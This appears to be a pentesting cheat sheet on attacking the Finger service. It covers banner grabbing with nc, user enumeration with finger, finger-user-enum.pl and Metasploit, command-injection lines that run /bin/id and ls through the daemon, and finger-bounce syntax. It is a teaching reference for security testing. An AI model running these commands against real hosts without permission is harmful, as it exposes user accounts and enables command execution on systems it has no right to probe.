Finger
Finger usually uses port 79
What is Finger?
Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user’s plan and project files.
1
2
| PORT STATE SERVICE VERSION
79/tcp open fing Debian fingerd
|
Finger Pentesting
![https://www.shodan.io/static/img/favicon.png]() Shodan search query : |
|---|
port:79 |
Banner Grabbing
1
2
| nc -vn 10.10.x.x 79
echo "root" | nc -vn 10.10.x.x 79
|
Finger Credentials
User Enumeration
1
2
3
4
5
6
7
8
9
10
11
| finger @10.10.x.x #List users
finger admin@10.10.x.x #Get info of user
finger user@10.10.x.x #Get info of user
#########
finger admin@192.186.x.x
Login: admin Name: Jhon Doe
Directory: /home/admin Shell: /bin/bash
Never logged in.
No mail.
No Plan.
|
Alternatively you can use finger-user-enum from pentestmonkey, some examples:
Download script and run it with a wordlist: HERE
finger-user-enum.pl is a tool for enumerating OS-level user accounts via the finger service. As of release v1.0 it is known to work against the default Solaris daemon. It may not yet work against all daemons since there is no defined format for the data returned by the finger service.
1
2
3
| finger-user-enum.pl -U users.txt -t 10.10.x.x
finger-user-enum.pl -u root -t 10.10.x.x
finger-user-enum.pl -U users.txt -T ips.txt
|
![Untitled]()
1
| msf > use auxiliary/scanner/finger/finger_users
|
![Untitled]()
Code Execution
1
2
| finger "|/bin/id@10.10.x.x"
finger "|/bin/ls -a /@10.10.x.x"
|
Finger Bounce
1
2
| finger user@host@victim
finger @internal@external
|
Shodan search query :
Comments powered by Disqus.